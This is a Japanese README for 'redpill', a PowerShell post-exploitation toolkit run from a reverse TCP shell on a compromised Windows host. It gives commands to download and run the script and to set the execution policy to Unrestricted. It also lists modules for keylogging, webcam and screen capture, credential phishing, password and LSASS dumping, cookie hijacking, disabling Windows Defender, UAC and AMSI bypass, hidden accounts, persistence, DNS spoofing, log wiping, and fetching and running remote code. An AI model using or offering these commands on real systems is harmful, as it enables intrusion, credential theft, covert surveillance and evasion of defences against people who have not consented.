
redpillプロジェクトは、リバースTCPシェルのポストエクスプロレーションタスクを支援することを目的としています。多くの場合、レッドチームの任務では、
システム管理者が実装した防御を回避するために、リバースTCPシェル(metasploitではない)のような型にはまらない方法でターゲットシステムにアクセスする必要があります。
最初のステップが正常に完了した後、私たちは別の種類の問題に直面します: 「ターゲットシステムへの(シェル)アクセスを手に入れたが、今それをどう活用すればいいのか?」
このプロジェクトは、さまざまなポストエクスプロイテーションタスクを実行する複数のPowerShellスクリプトで構成されています。
メインスクリプトredpill.ps1 は、このリポジトリに含まれるスクリプトをダウンロード/設定/実行することが主な役割です。
目標は、リバースTCPシェルプロンプトでメータープリターに類似したエクスペリエンスを実現することです(メータープリターに類似したオプション)
このコマンドレットは、ポストエクスプロイテーションモジュールとしてvenom v1.0.17.8の構造に属しています。
venomのAMSI回避エージェントは、このCmdLetを自動的に%TMP%ディレクトリにアップロードし、
リバースTCPシェル(シェルプロンプト)で簡単にアクセスできるようにします。
利用可能なすべてのパラメータを一覧表示するには、PowerShellプロンプトで次を実行します:
.\redpill.ps1 -Help Parameters
このコマンドレットは、ポストエクスプロイテーションモジュールとしてvenom v1.0.17.8の構造に属しています。
venomのAMSI回避エージェントは、このCmdLetを自動的に%TMP%ディレクトリにアップロードし、
リバースTCPシェル(シェル)で簡単にアクセスできるようにします。
'このセクションでは、ターゲットホストを悪用せずにこのCmdletをローカルでテストする方法について説明します'
1º - GitHubリポジトリから'ローカルディスク'にCmdLetをダウンロードする
iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/redpill.ps1 -OutFile redpill.ps1|Unblock-File
2º - PowerShellの実行ポリシーを'UnRestricted'に設定する
Set-ExecutionPolicy UnRestricted -Scope CurrentUser

3º - 'redpill.ps1'の保存ディレクトリに移動する
cd C:\Users\pedro\Desktop

4º - CmdLetのヘルプメニュー(すべてのパラメータ)にアクセスする
.\redpill.ps1 -Help Parameters

このコマンドレットは、ポストエクスプロイテーションモジュールとしてvenom v1.0.17.8の構造に属しています。
venomのAMSI回避エージェントは、このCmdLetを自動的に%TMP%ディレクトリにアップロードし、
リバースTCPシェル(シェルプロンプト)で簡単にアクセスできるようにします。
1º - リバースTCPシェルプロンプトで実行する
[SKYNET] C:\Users\pedro\AppData\Local\Temp> powershell -File redpill.ps1 -Help Parameters

2º - [ -WifiPasswords ]の詳細パラメータヘルプにアクセスする
[SKYNET] C:\Users\pedro\AppData\Local\Temp> powershell -File redpill.ps1 -Help WifiPasswords

3º - [ -WifiPasswords ] [ Dump ]モジュールを実行する
[SKYNET] C:\Users\pedro\AppData\Local\Temp> powershell -File redpill.ps1 -WifiPasswords Dump

iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/redpill.ps1 -OutFile redpill.ps1|Unblock-File

デモ - このチュートリアルでは、sysinfo、GetPasswords、UacMeモジュールを使用しています
MouseLogger - マウスクリックのスクリーンショットをpsr.exeを使用してキャプチャ
PhishCreds - ログイン資格情報をフィッシング、またはユーザーアカウントパスワードをブルートフォース
FileMace - ファイルのタイムスタンプ(作成時間、最終アクセス時間、最終書き込み時間)を変更
CsOnTheFly - CSスクリプトを(URLから)ダウンロード、自動コンパイル、実行をオンザフライで!
EOP - 権限昇格のための不足しているソフトウェアパッチを検索






| CmdLetパラメータ名 | パラメータ引数 | 説明 |
|---|
| -SysInfo | Enum | Verbose | クイックシステム情報または詳細列挙 |
| -GetConnections | Enum | Verbose | リモートホストのアクティブTCP接続を列挙 |
| -GetDnsCache | Enum | Clear | リモートホストのDNSキャッシュエントリを列挙/クリア |
| -GetInstalled | Enum | リモートホストにインストールされたアプリケーションを列挙 |
| -GetProcess | Enum | Kill | Tokens | リモートホストの実行中プロセスを列挙または強制終了 |
| -GetTasks | Enum | Create | Delete | リモートホストの実行中タスクを列挙/作成/削除 |
| -GetLogs | Enum | Verbose | Clear | eventvwrログを列挙、またはすべてのイベントログをクリア |
| -LiveStream | Bind | Reverse | Stop | MJPEGを使用してターゲットデスクトップをストリーミングするNishangスクリプト |
| -GetBrowsers | Enum | Verbose | Creds | インストール済みブラウザとバージョンを列挙、または詳細表示 |
| -GetSkype | Contacts|DomainUsers | フェデレーションSkypeの列挙と攻撃 |
| -Screenshot | 1 | デスクトップのスクリーンショットを1枚取得し、%TMP%に保存 |
| -Camera | Enum | Snap | コンピュータのウェブカメラを列挙、またはデフォルトのWebカメラでスナップショットを取得 |
| -StartWebServer | Python | Powershell | Webサーバーを%TMP%にダウンロードして実行 |
| -Keylogger | Start | Stop | リモートホストのキーストローク記録の開始または停止 |
| -MouseLogger | Start | マウスクリックのスクリーンショットを10秒間キャプチャ |
| -PhishCreds | Start | Brute | 現在のユーザーに有効な資格情報を求め、キャプチャをリーク |
| -GetPasswords | Enum | Dump | さまざまな場所(ストア/レジストリ/ディスク)のパスワードを列挙 |
| -PasswordSpray | Spray | Active Directoryのアカウントに対するパスワードスプレー攻撃! |
| -WifiPasswords | Dump | ZipDump | 利用可能なSSIDを列挙、またはすべてのWiFiパスワードをZipDump |
| -EOP | Enum | Verbose | 権限昇格のための不足しているソフトウェアパッチを検索 |
| -ADS | Enum | Create | Exec | Clear | $DATAレコード(ADS)にスクリプト(bat | ps1 | exe)を隠蔽 |
| -BruteZip | $Env:TMP\archive.zip | 7z.exeを使用して選択したZipアーカイブをブルートフォース |
| -Upload | script.ps1 | 攻撃者のapache2 webrootからscript.ps1をアップロード |
| -Persiste | $Env:TMP\Script.ps1 | 起動時にscript.ps1を永続化(BeaconHome) |
| -CleanTracks | Clear | Paranoid | ディスク上のアーティファクトをクリーンアップ(システムトレースのクリーン) |
| -AppLocker | Enum | WhoAmi | TestBat | 弱い権限を持つAppLockerディレクトリを列挙 |
| -FileMace | $Env:TMP\test.txt | ファイルのMACE(作成時間、最終アクセス時間、最終書き込み時間)を変更 |
| -MetaData | $Env:TMP\test.exe | ファイル/アプリケーションの説明(メタデータ)を表示 |
| -psgetsys | Enum | Auto | Impersonate | 異なる親プロセス下でプロセスを生成! |
| -MsgBox | "Hello World." | ローカルホストに"Hello World."メッセージボックスを生成(wscriptComObject) |
| -SpeakPrank | "Hello World." | リモートホストに入力された文章を発話させる(いたずら) |
| -NetTrace | Enum | netshを使用した積極的な列挙(ネイティブ) |
| -PingSweep | Enum | Verbose | ローカルLAN上のアクティブIPアドレスとオープンポートを列挙 |
| -DnsSpoof | Enum | Redirect | Clear | ドメイン名をフィッシングIPアドレスにリダイレクト |
| -DisableAV | Query | Start | Stop | Windows Defenderサービス(WinDefend)を無効化 |
| -HiddenUser | Query | Create | Delete | 隠しユーザーアカウントの照会/作成/削除 |
| -CsOnTheFly | Compile | Execute | CSスクリプトのダウンロード、コンパイル(exe)、実行 |
| -CookieHijack | Dump|History | Edge|ChromeのCookieハイジャックツール |
| -UacMe | Bypass | Elevate | Clean | DLLリフレクションによるUACバイパス/EOP!(cmstp.exe) |
| -GetAdmin | check | exec | セッションをUserLandから管理者に昇格! |
| -NoAmsi | List | TestAll | Bypass | AMSIバイパスのテスト、または単一のバイパスを実行 |
| -Clipboard | Enum | Capture | Prank | クリップボードのテキスト/ファイル/画像/音声の内容をキャプチャ! |
| -GetCounterMeasures | Enum | verbose | 実行中の一般的なセキュリティプロセス/PIDを一覧表示! |
| -DumpLsass | lsass| all | lsass/sam/system/securityプロセス/レジストリハイブからデータをダンプ |
各パラメータの詳細情報を表示するには、次を実行します:
Syntax : .\redpill.ps1 -Help [ Parameter Name ]
Example: .\redpill.ps1 -Help WifiPasswords

5º - [ -WifiPasswords ]の詳細パラメータヘルプにアクセスする
Syntax : .\redpill.ps1 -Help [ Parameter Name ]
Example: .\redpill.ps1 -Help WifiPasswords

6º - [ -WifiPasswords ] [ Dump ]モジュールを実行する
Syntax : .\redpill.ps1 [ Parameter Name ] [ @argument ]
Example: .\redpill.ps1 -WifiPasswords Dump

7º - [ -sysinfo ] [ Enum ]モジュールを実行する
Syntax : .\redpill.ps1 [ Parameter Name ] [ @argument ]
Example: .\redpill.ps1 -sysinfo Enum

| hax0r | 機能 | OSの種類 |
|---|
| @youhacker55 | このcmdletのデバッグにおけるすべての助けに対して(BETA版のテスト) | Windows 7 x64bits |
| @0xyg3n | このcmdletのデバッグにおけるすべての助けに対して(BETA版のテスト) | Windows 10 x64bits |
| @Shanty_Damayanti | このcmdletのデバッグ(amsi文字列検出バイパス) | Windows 10 x64bits |
| @miltinhoc | このcmdletのデバッグとビデオチュートリアルの録画 | Windows 10 x64bits |